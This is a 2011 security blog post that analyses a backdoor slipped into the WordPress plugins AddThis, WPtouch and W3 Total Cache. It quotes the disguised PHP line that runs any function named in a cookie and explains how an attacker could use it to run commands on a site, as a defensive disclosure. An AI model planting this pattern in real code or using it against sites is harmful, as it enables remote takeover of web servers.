WordPress plugins hacked – Understanding the backdoor

  • June 22, 2011

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did a amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the WordPress.org team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1]&#46$matches[2]; 

What does this code do

Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific COOKIE is set, and if it is, it parses the content into the $matches variable. After that, it executes the code by calling ($matches[1]($matches[2])) ). That is possible because variable names can be called as functions in PHP (so matches1 is the name, and matches2 the argument of the function).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that plugins.trac.wordpress.org is down at the moment.

Another thing to highlight, which Matt stated in the news release on WordPress.org, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
8 comments

  1. Found this code in two footer.php files in a multi-site environment: http://d.pr/W60r  Pretty sure it’s because I updated to the bad version of AddThis.  Also had a bunch of new folders/files int the uploads folder. 

    1. so the code found in my footer.php files had nothing to do with these three plugins, but rather with “WP-phpmyadmin WordPress plugin” that you reported on here: https://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html

  3. Kudos to the WordPress.org core team and all the volunteers of WordPress.
    Please keep this up as most of us are not code-savvy.

  4. Pingback: tgeorge on "The Wordpress plugin w3-total-cache affected by a security vulnerability." | Upgrade Wordpress Now
  5. Pingback: Plug ‘n Play’s Promiscuous Culture
  7. Pingback: Plug ‘n Play’s Promiscuous Culture | Application Security News, Research, Trends – Veracode Blog

Comments are closed.

Related Categories
You May Also Like